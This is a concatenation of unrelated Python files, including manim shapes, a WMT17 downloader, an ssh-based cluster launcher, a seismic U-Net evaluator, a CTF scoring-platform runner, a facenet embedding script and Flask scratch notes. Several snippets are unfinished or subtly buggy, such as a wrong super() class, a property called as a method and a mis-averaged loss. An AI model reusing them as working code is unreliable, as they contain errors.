def aspect_ratio(self):
"""The aspect ratio.
When set, the width is stretched to accommodate
the new aspect ratio.
"""
return self.width / self.height
@aspect_ratio.setter
def aspect_ratio(self, value):
self.stretch_to_fit_width(value * self.height)
class FullScreenRectangle(ScreenRectangle):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = config["frame_height"]
@deprecated(
since="v0.12.0",
until="v0.13.0",
message="This method is deprecated due to decluttering purpose.",
replacement="FullScreenRectangle(stroke_width=0, fill_color=BLACK, fill_opacity=0.7)",
)
class FullScreenFadeRectangle(FullScreenRectangle):
def __init__(self, stroke_width=0, fill_color=BLACK, fill_opacity=0.7, **kwargs):
super().__init__(
stroke_width=stroke_width,
fill_color=fill_color,
fill_opacity=fill_opacity,
**kwargs
)
@deprecated(
since="v0.12.0",
until="v0.13.0",
message="This method is deprecated due to decluttering purpose.",
)
class PictureInPictureFrame(Rectangle):
def __init__(self, height=3, aspect_ratio=16.0 / 9.0, **kwargs):
super().__init__(width=aspect_ratio * height, height=height, **kwargs)
@property
def aspect_ratio(self):
"""The aspect ratio.
When set, the width is stretched to accommodate
the new aspect ratio.
"""
return self.width / self.height
@aspect_ratio.setter
def aspect_ratio(self, value):
self.stretch_to_fit_width(value * self.height)
|
# Copyright 2018 MLBenchmark Group. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download and preprocess WMT17 ende training and evaluation datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
import sys
import tarfile
import urllib
import urllib.request
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
logging.getLogger().setLevel(logging.INFO)
# Data sources for training/evaluating the transformer translation model.
_TRAIN_DATA_SOURCES = [
{
"url": "http://data.statmt.org/wmt17/translation-task/"
"training-parallel-nc-v12.tgz",
"input": "news-commentary-v12.de-en.en",
"target": "news-commentary-v12.de-en.de",
},
{
"url": "http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz",
"input": "commoncrawl.de-en.en",
"target": "commoncrawl.de-en.de",
},
{
"url": "http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz",
"input": "europarl-v7.de-en.en",
"target": "europarl-v7.de-en.de",
},
]
_EVAL_DATA_SOURCES = [
{
"url": "http://data.statmt.org/wmt17/translation-task/dev.tgz",
"input": "newstest2013.en",
"target": "newstest2013.de",
}
]
def find_file(path, filename, max_depth=5):
"""Returns full filepath if the file is in path or a subdirectory."""
for root, dirs, files in os.walk(path):
if filename in files:
return os.path.join(root, filename)
# Don't search past max_depth
depth = root[len(path) + 1:].count(os.sep)
if depth > max_depth:
del dirs[:] # Clear dirs
return None
###############################################################################
# Download and extraction functions
###############################################################################
def get_raw_files(raw_dir, data_source):
"""Return raw files from source. Downloads/extracts if needed.
Args:
raw_dir: string directory to store raw files
data_source: dictionary with
{"url": url of compressed dataset containing input and target files
"input": file with data in input language
"target": file with data in target language}
Returns:
dictionary with
{"inputs": list of files containing data in input language
"targets": list of files containing corresponding data in target language
}
"""
raw_files = {
"inputs": [],
"targets": [],
} # keys
for d in data_source:
input_file, target_file = download_and_extract(
raw_dir, d["url"], d["input"], d["target"])
raw_files["inputs"].append(input_file)
raw_files["targets"].append(target_file)
return raw_files
def download_report_hook(count, block_size, total_size):
"""Report hook for download progress.
Args:
count: current block number
block_size: block size
total_size: total size
"""
percent = int(count * block_size * 100 / total_size)
print("\r%d%%" % percent + " completed", end="\r")
def download_from_url(path, url):
"""Download content from a url.
Args:
path: string directory where file will be downloaded
url: string url
Returns:
Full path to downloaded file
"""
filename = url.split("/")[-1]
found_file = find_file(path, filename, max_depth=0)
if found_file is None:
filename = os.path.join(path, filename)
logging.info("Downloading from %s to %s." % (url, filename))
inprogress_filepath = filename + ".incomplete"
inprogress_filepath, _ = urllib.request.urlretrieve(
url, inprogress_filepath, reporthook=download_report_hook)
# Print newline to clear the carriage return from the download progress.
print()
os.rename(inprogress_filepath, filename)
return filename
else:
logging.info("Already downloaded: %s (at %s)." % (url, found_file))
return found_file
def download_and_extract(path, url, input_filename, target_filename):
"""Extract files from downloaded compressed archive file.
Args:
path: string directory where the files will be downloaded
url: url containing the compressed input and target files
input_filename: name of file containing data in source language
target_filename: name of file containing data in target language
Returns:
Full paths to extracted input and target files.
Raises:
OSError: if the the download/extraction fails.
"""
logging.info('Downloading and extracting data to: %s' % path)
# Check if extracted files already exist in path
input_file = find_file(path, input_filename)
target_file = find_file(path, target_filename)
if input_file and target_file:
logging.info("Already downloaded and extracted %s." % url)
return input_file, target_file
# Download archive file if it doesn't already exist.
compressed_file = download_from_url(path, url)
# Extract compressed files
logging.info("Extracting %s." % compressed_file)
with tarfile.open(compressed_file, "r:gz") as corpus_tar:
corpus_tar.extractall(path)
# Return filepaths of the requested files.
input_file = find_file(path, input_filename)
target_file = find_file(path, target_filename)
if input_file and target_file:
return input_file, target_file
raise OSError("Download/extraction failed for url %s to path %s" %
(url, path))
def make_dir(path):
if not os.path.isdir(path):
logging.info("Creating directory %s" % path)
os.mkdir(path)
def main(unused_argv):
"""Obtain training and evaluation data for the Transformer model."""
make_dir(FLAGS.raw_dir)
make_dir(FLAGS.data_dir)
# Get paths of download/extracted training and evaluation files.
print("Step 1/4: Downloading data from source")
train_files = get_raw_files(FLAGS.raw_dir, _TRAIN_DATA_SOURCES)
eval_files = get_raw_files(FLAGS.raw_dir, _EVAL_DATA_SOURCES)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_dir", "-dd", type=str, default="/tmp/translate_ende",
help="[default: %(default)s] Directory for where the "
"translate_ende_wmt32k dataset is saved.",
metavar="<DD>")
parser.add_argument(
"--raw_dir", "-rd", type=str, default="/tmp/translate_ende_raw",
help="[default: %(default)s] Path where the raw data will be downloaded "
"and extracted.",
metavar="<RD>")
FLAGS, unparsed = parser.parse_known_args()
main(sys.argv)
|
#! /usr/bin/env python
## include packages
import commands
import subprocess
import sys
import signal
import time
import xml.etree.cElementTree as ET ## parsing the xml file
from run_util import print_with_tag
#====================================#
## config parameters and global parameters
## default mac set
mac_set = [ ]
## bench config parameters
worker_num = 1;
scale_factor = worker_num;
nthread = 8
mac_num = 2
port = 8090
#port = 9080
config_file = "config.xml"
## start parese input parameter"
exe = ""
args = ""
base_cmd = "./%s %s"
#====================================#
## class definations
class GetOutOfLoop(Exception):
## a dummy class for exit outer loop
pass
#====================================#
## helper functions
def copy_file(f):
for host in mac_set:
subprocess.call(["scp","./%s" % f,"%s:%s" % (host,"~")])
def kill_servers():
# print "ending ... kill servers..."
kill_cmd = "pkill %s" % exe
for i in xrange(len(mac_set)):
subprocess.call(["ssh","-n","-f",mac_set[i],kill_cmd])
return
## singal handler
def signal_int_handler(signal, frame):
print_with_tag("ENDING","send ending messages in SIGINT handler")
print_with_tag("ENDING","kill processes")
kill_servers()
sys.exit(0)
return
def parse_input():
global config_file, exe, args, base_cmd
if (len(sys.argv)) > 1: ## config file name
config_file = sys.argv[1]
if (len(sys.argv)) > 2: ## exe
exe = sys.argv[2]
if (len(sys.argv)) > 3: ## cmdline arg to exe
args = sys.argv[3]
base_cmd = (base_cmd % (exe, args)) + " -n %d" + " 1>log 2>&1 &"
return
# print "starting with config file %s" % config_file
def parse_bench_parameters(f):
global mac_set, mac_num
tree = ET.ElementTree(file=f)
root = tree.getroot()
assert root.tag == "param"
mac_set = []
for e in root.find("network").findall("a"):
mac_set.append(e.text.strip())
return
def start_servers(macset,config,bcmd):
assert(len(macset) >= 1)
for i in xrange(1,len(macset)):
cmd = bcmd % (i)
print cmd
subprocess.call(["ssh","-n","-f",macset[i],cmd])
## local process is executed right here
cmd = bcmd % 0
subprocess.call(cmd.split())
return
def prepare_files(files):
print "Start preparing start file"
for f in files:
copy_file(f)
return
#====================================#
## main function
def main():
global base_cmd
parse_input() ## parse input from command line
parse_bench_parameters(config_file) ## parse bench parameter from config file
print "[START] Input parsing done."
kill_servers()
prepare_files([exe,config_file]) ## copy related files to remote
print "[START] cleaning remaining processes."
time.sleep(1) ## ensure that all related processes are cleaned
signal.signal(signal.SIGINT, signal_int_handler) ## register signal interrupt handler
start_servers(mac_set,config_file,base_cmd) ## start server processes
while True:
## forever loop
time.sleep(10)
return
#====================================#
## the code
if __name__ == "__main__":
main()
|
# ============================================================== #
# Fusnet eval #
# #
# #
# Eval fusnet with processed dataset in tfrecords format #
# #
# Author: Karim Tarek #
# ============================================================== #
from __future__ import print_function
import quakenet.data_pipeline_unet as dp
import numpy as np
#np.set_printoptions(threshold='nan')
import tensorflow as tf
import quakenet.config as config
import argparse
import os
import time
import glob
import setproctitle
import unet
import fnmatch
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
# Basic model parameters as external flags.
FLAGS = None
def maybe_save_images(predict_images,images, filenames):
"""
Save images to disk
-------------
Args:
images: numpy array [batch_size, image_size, image_size]
filenames: numpy string array, filenames corresponding to the images [batch_size]
"""
if FLAGS.output_dir is not None:
batch_size = predict_images.shape[0]
for i in xrange(batch_size):
image_array = predict_images[i, :]
image_array1 = images[i, :,1]
print (image_array.shape,image_array1.shape)
indexs=list(range(0,image_array.shape[0]))
file_path = os.path.join(FLAGS.output_dir, filenames[i])
ax = plt.subplot(211)
plt.plot(indexs,image_array)
plt.subplot(212, sharex=ax)
plt.plot(indexs, image_array1)
plt.savefig(file_path)
plt.close()
def evaluate():
"""
Eval unet using specified args:
"""
if FLAGS.events:
summary_dir = os.path.join(FLAGS.checkpoint_path,"events")
while True:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_path)
if FLAGS.eval_interval < 0 or ckpt:
print ('Evaluating model')
break
print ('Waiting for training job to save a checkpoint')
time.sleep(FLAGS.eval_interval)
#data_files, data_size = load_datafiles(FLAGS.tfrecords_prefix)
setproctitle.setproctitle('quakenet')
tf.set_random_seed(1234)
cfg = config.Config()
cfg.batch_size = FLAGS.batch_size
cfg.add = 1
cfg.n_clusters = FLAGS.num_classes
cfg.n_clusters += 1
cfg.n_epochs = 1
model_files = [file for file in os.listdir(FLAGS.checkpoint_path) if
fnmatch.fnmatch(file, '*.meta')]
for model_file in sorted(model_files):
step = model_file.split(".meta")[0].split("-")[1]
print (step)
try:
model_file = os.path.join(FLAGS.checkpoint_path, model_file)
# data pipeline for positive and negative examples
pos_pipeline = dp.DataPipeline(FLAGS.tfrecords_dir, cfg, True)
# images:[batch_size, n_channels, n_points]
images = pos_pipeline.samples
labels = pos_pipeline.labels
logits = unet.build_30s(images, FLAGS.num_classes, False)
predicted_images = unet.predict(logits, FLAGS.batch_size, FLAGS.image_size)
accuracy = unet.accuracy(logits, labels)
loss = unet.loss(logits, labels,FLAGS.weight_decay_rate)
summary_writer = tf.summary.FileWriter(summary_dir, None)
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
sess = tf.Session()
sess.run(init_op)
saver = tf.train.Saver()
#if not tf.gfile.Exists(FLAGS.checkpoint_path + '.meta'):
if not tf.gfile.Exists(model_file):
raise ValueError("Can't find checkpoint file")
else:
print('[INFO ]\tFound checkpoint file, restoring model.')
saver.restore(sess, model_file.split(".meta")[0])
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess = sess, coord = coord)
#metrics = validation_metrics()
global_accuracy = 0.0
global_p_accuracy = 0.0
global_s_accuracy = 0.0
global_n_accuracy = 0.0
global_loss = 0.0
n = 0
#mean_metrics = {}
#for key in metrics:
# mean_metrics[key] = 0
#pred_labels = np.empty(1)
#true_labels = np.empty(1)
try:
while not coord.should_stop():
acc_seg_value,loss_value,predicted_images_value,images_value = sess.run([accuracy,loss,predicted_images,images])
accuracy_p_value=acc_seg_value[1][1]
accuracy_s_value=acc_seg_value[1][2]
accuracy_n_value=acc_seg_value[1][0]
#pred_labels = np.append(pred_labels, predicted_images_value)
#true_labels = np.append(true_labels, images_value)
global_p_accuracy += accuracy_p_value
global_s_accuracy += accuracy_s_value
global_n_accuracy += accuracy_n_value
global_loss += loss_value
# print true_labels
#for key in metrics:
# mean_metrics[key] += cfg.batch_size * metrics_[key]
filenames_value=[]
# for i in range(FLAGS.batch_size):
# filenames_value.append(str(step)+"_"+str(i)+".png")
#print (predicted_images_value[:,100:200])
if (FLAGS.plot):
maybe_save_images(predicted_images_value, images_value,filenames_value)
#s='loss = {:.5f} | det. acc. = {:.1f}% | loc. acc. = {:.1f}%'.format(metrics['loss']
print('[PROGRESS]\tAccuracy for current batch: | P. acc. =%.5f| S. acc. =%.5f| '
'noise. acc. =%.5f.' % (accuracy_p_value,accuracy_s_value,accuracy_n_value))
#n += cfg.batch_size
n += 1
# step += 1
print (n)
except KeyboardInterrupt:
print ('stopping evaluation')
except tf.errors.OutOfRangeError:
print ('Evaluation completed ({} epochs).'.format(cfg.n_epochs))
print ("{} windows seen".format(n))
#print('[INFO ]\tDone evaluating in %d steps.' % step)
if n > 0:
loss_value /= n
summary = tf.Summary(value=[tf.Summary.Value(tag='loss/val', simple_value=loss_value)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
global_accuracy /= n
global_p_accuracy /= n
global_s_accuracy /= n
global_n_accuracy /= n
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val', simple_value=global_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_p', simple_value=global_p_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_s', simple_value=global_s_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_noise', simple_value=global_n_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
print('[End of evaluation for current epoch]\n\nAccuracy for current epoch:%s | total. acc. =%.5f| P. acc. =%.5f| S. acc. =%.5f| '
'noise. acc. =%.5f.' % (step,global_accuracy, global_p_accuracy, global_s_accuracy, global_n_accuracy))
print ('Sleeping for {}s'.format(FLAGS.eval_interval))
time.sleep(FLAGS.eval_interval)
summary_writer.flush()
finally:
# When done, ask the threads to stop.
coord.request_stop()
tf.reset_default_graph()
#print('Sleeping for {}s'.format(FLAGS.eval_interval))
#time.sleep(FLAGS.eval_interval)
finally:
print ('joining data threads')
coord = tf.train.Coordinator()
coord.request_stop()
#pred_labels = pred_labels[1::]
#true_labels = true_labels[1::]
#print ("---Confusion Matrix----")
#print (confusion_matrix(true_labels, pred_labels))
# Wait for threads to finish.
coord.join(threads)
sess.close()
def main(_):
"""
Run unet prediction on input tfrecords
"""
if FLAGS.output_dir is not None:
if not tf.gfile.Exists(FLAGS.output_dir):
print('[INFO ]\tOutput directory does not exist, creating directory: ' + os.path.abspath(FLAGS.output_dir))
tf.gfile.MakeDirs(FLAGS.output_dir)
evaluate()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Eval Unet on given tfrecords.')
parser.add_argument('--tfrecords_dir', help = 'Tfrecords directory')
parser.add_argument('--tfrecords_prefix', help = 'Tfrecords prefix', default = 'training')
parser.add_argument('--checkpoint_path', help = 'Path of checkpoint to restore. (Ex: ../Datasets/checkpoints/unet.ckpt-80000)')
parser.add_argument('--eval_interval', type=int, default=1,
help='sleep time between evaluations')
parser.add_argument('--num_classes', help = 'Number of segmentation labels', type = int, default = 3)
parser.add_argument('--image_size', help = 'Target image size (resize)', type = int, default = 3001)
parser.add_argument('--batch_size', help = 'Batch size', type = int, default = 2)
parser.add_argument('--events', action='store_true',
help='pass this flag if evaluate acc on events')
parser.add_argument('--weight_decay_rate', help='Weight decay rate', type=float, default=0.0005)
parser.add_argument('--save_summary',type=bool,default=True,
help='True to save summary in tensorboard')
parser.add_argument('--output_dir', help = 'Output directory for the prediction files. If this is not set then predictions will not be saved')
parser.add_argument("--plot", action="store_true",help="pass flag to plot detected events in output")
FLAGS, unparsed = parser.parse_known_args()
tf.app.run()
|
from config.main import *
from pymongo import MongoClient
import functions
import argparse
client = MongoClient(host=DATABASE['HOST'], port=DATABASE['PORT'], Connect=False)
#client.jury.authenticate(DATABASE['USER'], DATABASE['PASSWORD'])
db = client.jury
def init(parse):
from classes.initialize import Initialize
Initialize(db, parse.type[0])
def start(parse):
if parse.slave:
from classes.zond import Zond
zond = Zond(db)
zond.run()
else:
from classes.round import Round
round = Round(db)
round.nextPut()
round.nextCheck()
functions.set_interval(round.nextPut, CHECKER['ROUND_LENGTH'])
functions.set_interval(round.nextCheck, CHECKER['CHECK_LENGTH'])
def flags(parse):
from classes.flags import Flags
flags = Flags(db)
flags.start()
def scoreboard(parse):
from classes.scoreboard import Scoreboard
scoreboard = Scoreboard(db)
scoreboard.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='The platform for the CTF-competition (Attack-Defense)',
epilog='''Order of actions: init -> start -> flags -> scoreboard.
Good game!''')
sp = parser.add_subparsers(help='sub-command help')
sp_init = sp.add_parser('init', help='Initialize the game. Generate teams, services, statistics.')
sp_init.add_argument('--type', help='type of configuration file', nargs='*', default=['json', 'api'])
sp_init.set_defaults(func=init)
sp_start = sp.add_parser('start', help='Run checkers and start the game.')
sp_start.add_argument('--slave', help='Run as slave', action='store_true')
sp_start.set_defaults(func=start)
sp_flags = sp.add_parser('flags', help='The start of the module "flags"')
sp_flags.set_defaults(func=flags)
sp_scoreboard = sp.add_parser('scoreboard', help='Run scoreboard')
sp_scoreboard.set_defaults(func=scoreboard)
if 'func' in parser.parse_args():
parser.parse_args().func(parser.parse_args())
else:
parser.print_help()
|
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from parameterized import parameterized
from tests import utils
class SimpleFloorDivideModule(torch.nn.Module):
def __init__(self, inplace=False):
super(SimpleFloorDivideModule, self).__init__()
self.inplace = inplace
def forward(self, a, b):
if b.size() == torch.Size([]):
b = b.item()
if self.inplace:
return (a + a).floor_divide_(b)
else:
return (a + a).floor_divide(b)
class TestFloorDiv(unittest.TestCase):
@unittest.skip(
reason="Disabled while PyTorch floor_divide is fixed: github.com/pytorch/pytorch/issues/43874"
)
def test_floor_div_basic(self):
"""Basic test of the PyTorch div Node on Glow."""
def test_f(a, b):
return (a + a).floor_divide(1.9)
x = torch.randn(4)
y = torch.randn(4)
utils.compare_tracing_methods(test_f, x, y, fusible_ops={"aten::floor_divide"})
@parameterized.expand(
[
(
"basic",
SimpleFloorDivideModule(),
torch.Tensor(4).random_(0, 5),
torch.Tensor(4).random_(1, 5),
),
(
"inplace",
SimpleFloorDivideModule(True),
torch.Tensor(4).random_(0, 5),
torch.Tensor(4).random_(1, 5),
),
(
"positive_float",
SimpleFloorDivideModule(),
torch.Tensor(4).random_(0, 5),
torch.tensor(3.9),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(8, 3, 4, 2).random_(0, 5),
torch.Tensor(4, 2).random_(1, 5),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(8, 3, 4, 2).random_(0, 5),
torch.Tensor(1, 2).random_(1, 5),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(4, 2).random_(0, 5),
torch.Tensor(8, 3, 4, 2).random_(1, 5),
),
]
)
def test_floor_div(self, _, module, left, right):
utils.compare_tracing_methods(
module, left, right, fusible_ops={"aten::floor_divide"}
)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import argparse
import facenet
import lfw
import os
import sys
import math
from sklearn import metrics
from scipy.optimize import brentq
from scipy import interpolate
def get_image_paths(facedir):
image_paths = []
if os.path.isdir(facedir):
images = os.listdir(facedir)
image_paths = [os.path.join(facedir,img) for img in images]
return image_paths
def main(input_path, output_path, batch_size, model, image_size):
with tf.Graph().as_default():
with tf.Session() as sess:
#for filename in os.listdir(input_path):
# x = filename.split('_')[0]
#directory = (output_path + "/" + x)
# Read the file containing the pairs used for testing
# pairs = lfw.read_pairs(os.path.expanduser(args.lfw_pairs))
# Get the paths for the corresponding images
# paths, actual_issame = lfw.get_paths(os.path.expanduser(args.lfw_dir), pairs, args.lfw_file_ext)
# Load the model
facenet.load_model(model)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
# image_size = images_placeholder.get_shape()[1] # For some reason this doesn't work for frozen graphs
image_size = image_size
embedding_size = embeddings.get_shape()[1]
# Run forward pass to calculate embeddings
print('Runnning forward pass on images')
#batch_size = batch_size
nrof_images = len(os.listdir(input_path))
nrof_batches = 1 # int(math.ceil(1.0 * nrof_images / batch_size))
emb_array = np.zeros((nrof_images, embedding_size))
for i in range(nrof_batches):
start_index = i * batch_size
print(start_index)
end_index = min((i + 1) * batch_size, nrof_images)
print(end_index)
#paths_batch = paths[start_index:end_index]
images = facenet.load_data(image_paths, False, False, image_size)
print("I got this far!")
feed_dict = {images_placeholder: images, phase_train_placeholder: False}
emb_array[start_index:end_index, :] = sess.run(embeddings, feed_dict=feed_dict)
# ValueError: Cannot feed value of shape (3, 182, 182, 3) for Tensor u'input:0', which has shape '(?, 160, 160, 3)'
#do I need to specify the shapt of the imput tensor somewhere?
np.savetxt('/home/iolie/tensorflow/THORN/crop/TEST', emb_array, delimiter=",")
### emb array is all the image vectors in the order they were run,
### but how to ensure they went in in the same order? since list.os takes files randomly??
### additional column in emb array??
###
input_path = ('/home/iolie/tensorflow/THORN/Minisample') #+ "/" + "0A0A937C-016C-49E6-A9CA-480292B491BC")
output_path = ('/home/iolie/tensorflow/THORN/Minisample') #+ "/" + "0A0A937C-016C-49E6-A9CA-480292B491BC")
batch_size = len(os.listdir(input_path))
model = "/home/iolie/tensorflow/THORN/msft-cfs-face-recognition/analysis/analysis/facenet/temp_models/20170512-110547"
image_size = 160
image_paths = get_image_paths(input_path)
main(input_path, output_path, batch_size, model, image_size)
## this should output a TEST.txt file to the crop folder, with the few test images all contained within
## how big should my batch be??
|
from pykka import ThreadingActor, Timeout
import logging
from util.message_utils import Action
class Consumer(ThreadingActor):
def __init__(self, producers, job, manager):
super(Consumer, self).__init__()
self.producers = producers
self.job = job
self.id = job.id
self.logger = logging.getLogger("src.Consumer")
self.manager = manager
self.clock = manager.clock
self.logger.info("New consumer made with id: " + str(self.id))
def send(self, message, receiver):
"""Send a message to another actor in a framework agnostic way"""
# Sends a blocking message to producers
receiver_id = receiver['id']
receiver = receiver["producer"]
try:
answer = receiver.ask(message, timeout=60)
action = answer['action']
if action == Action.decline:
self.logger.info("Job declined. Time = " + str(self.clock.now))
self.manager.punish_producer(receiver_id)
self.request_producer()
else:
self.logger.info("Job accepted. Time = " + str(self.clock.now))
self.manager.reward_producer(receiver_id)
except Timeout:
self.request_producer()
def receive(self, message):
"""Receive a message in a framework agnostic way"""
action = message['action']
if action == Action.broadcast:
self.producers.append(message['producer'])
def request_producer(self):
"""Function for selecting a producer for a job"""
if self.producers.empty():
self.logger.info("No producer remaining. Buying power from the grid.")
self.manager.register_contract(self.create_grid_contract())
self.stop()
return
# The producer is the third object in the tuple. The first two are for priorities.
producer_pri = self.producers.get()
self.logger.info("Asking producer with ranking " + str(producer_pri[0]))
producer = producer_pri[2]
message = {
'sender': self.actor_ref,
'action': Action.request,
'job': self.job
}
self.send(message, producer)
def create_grid_contract(self):
"""If the consumer buys power from the grid, they make a grid-contract."""
current_time = self.clock.now
id = "grid" + ";" + self.job.id + ";" + str(current_time)
time = self.job.scheduled_time
time_of_agreement = current_time
load_profile = self.job.load_profile
job_id = self.job.id
producer_id = "grid"
return dict(id=id, time=time, time_of_agreement=time_of_agreement, load_profile=load_profile,
job_id=job_id, producer_id=producer_id)
# FRAMEWORK SPECIFIC CODE
def on_receive(self, message):
"""Every message should have a sender field with the reference to the sender"""
self.receive(message)
|
TETRIMINO_T1 = ((0, 0, 0), \
(0, 1, 0), \
(1, 1, 1),)
TETRIMINO_T2 = ((0, 1, 0), \
(0, 1, 1), \
(0, 1, 0),)
TETRIMINO_T3 = ((0, 0, 0), \
(1, 1, 1), \
(0, 1, 0),)
TETRIMINO_T4 = ((0, 1, 0), \
(1, 1, 0), \
(0, 1, 0),)
TETRIMINO_L1 = ((0, 0, 0), \
(1, 0, 0), \
(1, 1, 1),)
TETRIMINO_L2 = ((0, 1, 1), \
(0, 1, 0), \
(0, 1, 0),)
TETRIMINO_L3 = ((0, 0, 0), \
(1, 1, 1), \
(0, 0, 1),)
TETRIMINO_L4 = ((0, 1, 0), \
(0, 1, 0), \
(1, 1, 0),)
TETRIMINO_J1 = ((0, 0, 0), \
(0, 0, 1), \
(1, 1, 1),)
TETRIMINO_J2 = ((0, 1, 0), \
(0, 1, 0), \
(0, 1, 1),)
TETRIMINO_J3 = ((0, 0, 0), \
(1, 1, 1), \
(1, 0, 0),)
TETRIMINO_J4 = ((1, 1, 0), \
(0, 1, 0), \
(0, 1, 0),)
TETRIMINO_Z1 = ((0, 0, 0), \
(1, 1, 0), \
(0, 1, 1),)
TETRIMINO_Z2 = ((0, 0, 1), \
(0, 1, 1), \
(0, 1, 0),)
TETRIMINO_S1 = ((0, 0, 0), \
(0, 1, 1), \
(1, 1, 0),)
TETRIMINO_S2 = ((1, 0, 0), \
(1, 1, 0), \
(0, 1, 0),)
TETRIMINO_I1 = ((0, 0, 0, 0), \
(1, 1, 1, 1), \
(0, 0, 0, 0), \
(0, 0, 0, 0),)
TETRIMINO_I2 = ((0, 0, 1, 0), \
(0, 0, 1, 0), \
(0, 0, 1, 0), \
(0, 0, 1, 0),)
TETRIMINO_O1 = ((0, 0, 0), \
(0, 1, 1), \
(0, 1, 1),)
|
from flask import request
from flask import Blueprint
from flask_restful import Api, Resource
from eventapp.models import db, Event, Admin, User, EventSignup
from eventapp.routes.response import SUCCESS, FAILURE
from flask import jsonify, make_response
from eventapp.services.signature_util import generate_signature
from eventapp.errors import SignatureError, UserNotFountError, EventNotFountError, AlreadySignupError
mod = Blueprint('event', __name__)
api = Api(mod)
class EventsEndPoint(Resource):
def get(self):
resp = {'status': SUCCESS}
http_code = 200
try:
events = Event.query.all()
resp['data'] = events
except Exception as err:
print(f'EventsEndPoint error happened {err}')
raise err
resp_str = jsonify(resp)
return make_response(resp_str, http_code)
api.add_resource(EventsEndPoint, '/events')
|
# send json by request and received
import requests
from flask import request, Response
r = requests.post('http://httpbin.org/post', json={"key": "value"})
r.status_code
r.json()
# receive json in flask
@app.route('/api/add_message/<uuid>', methods=['GET', 'POST'])
def add_message(uuid):
if request.is_json():
content = request.json
print(content)
return uuid
# calculate response time in flask
@app.after_request
def after_request(response):
diff = time.time() - g.start
if (response.response):
response.response[0] = response.response[0].replace(
'__EXECUTION_TIME__', str(diff))
return response
# response is a WSGI object, and that means the body of the response must be an iterable. For jsonify() responses that's just a list with just one string in it.
# However, you should use the response.get_data() method here to retrieve the response body, as that'll flatten the response iterable for you.
"""process_response(response)
Can be overridden in order to modify the response object before it’s sent to the WSGI server. By default this will call all the after_request() decorated functions.
Changed in version 0.5: As of Flask 0.5 the functions registered for after request execution are called in reverse order of registration.
Parameters: response – a response_class object.
Returns: a new response object or the same, has to be an instance of response_class."""
# The following should work:
@app.after_request
def after(response):
d = json.loads(response.get_data())
d['altered'] = 'this has been altered...GOOD!'
response.set_data(json.dumps(d))
return response
# Don't use jsonify() again here
# that returns a full new response object
# all you want is the JSON response body here.
# Do use response.set_data() as that'll also adjust the Content-Length header to reflect the altered response size.
@app.route('/data')
def get_data():
return {'foo': 'bar'}
# Here is a custom response class that supports the above syntax, without affecting how other routes that do not return JSON work in any way:
class MyResponse(Response):
@classmethod
def force_type(cls, rv, environ=None):
if isinstance(rv, dict):
rv = jsonify(rv)
return super(MyResponse, cls).force_type(rv, environ)
# Using a Custom Response Class
# By now I'm sure you agree that there are some interesting use cases that can benefit from using a custom response class. Before I show you some actual examples, let me tell you how simple it is to configure a Flask application to use a custom response class. Take a look at the following example:
from flask import Flask, Response
class MyResponse1(Response):
pass
app = Flask(__name__)
app.response_class = MyResponse1
# ...
from flask import Flask, Response
class MyResponse2(Response):
pass
class MyFlask(Flask):
response_class = MyResponse2
app = MyFlask(__name__)
# ...
# Changing Response Defaults
class MyResponse3(Response):
default_mimetype = 'application/xml'
# Determining Content Type Automatically
class MyResponse4(Response):
def __init__(self, response, **kwargs):
if 'mimetype' not in kwargs and 'contenttype' not in kwargs:
if response.startswith('<?xml'):
kwargs['mimetype'] = 'application/xml'
return super(MyResponse, self).__init__(response, **kwargs)
def my_decorator(f):
@wraps(f)
def wrapper(*args, **kwds):
print('Calling decorated function')
return f(*args, **kwds)
return wrapper
def typing(text: str):
res = text
try:
res = json.loads(text)['res']
print(res, 'try 1')
except Exception as error:
print(error)
try:
res = json.loads('{"res":{}}'.format(text))['res']
print(res, 'try 2')
except Exception:
pass
return res
|
# -*-coding:UTF-8-*-
from scripts.logger.lemon_logger import Logger
from scripts.tools.mutator_selection_logic import MCMC, Roulette
import argparse
import sys
import ast
import os
import numpy as np
from itertools import combinations
import redis
import pickle
from scripts.tools import utils
import shutil
import re
import datetime
import configparser
import warnings
np.random.seed(20200501)
warnings.filterwarnings("ignore")
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '2'
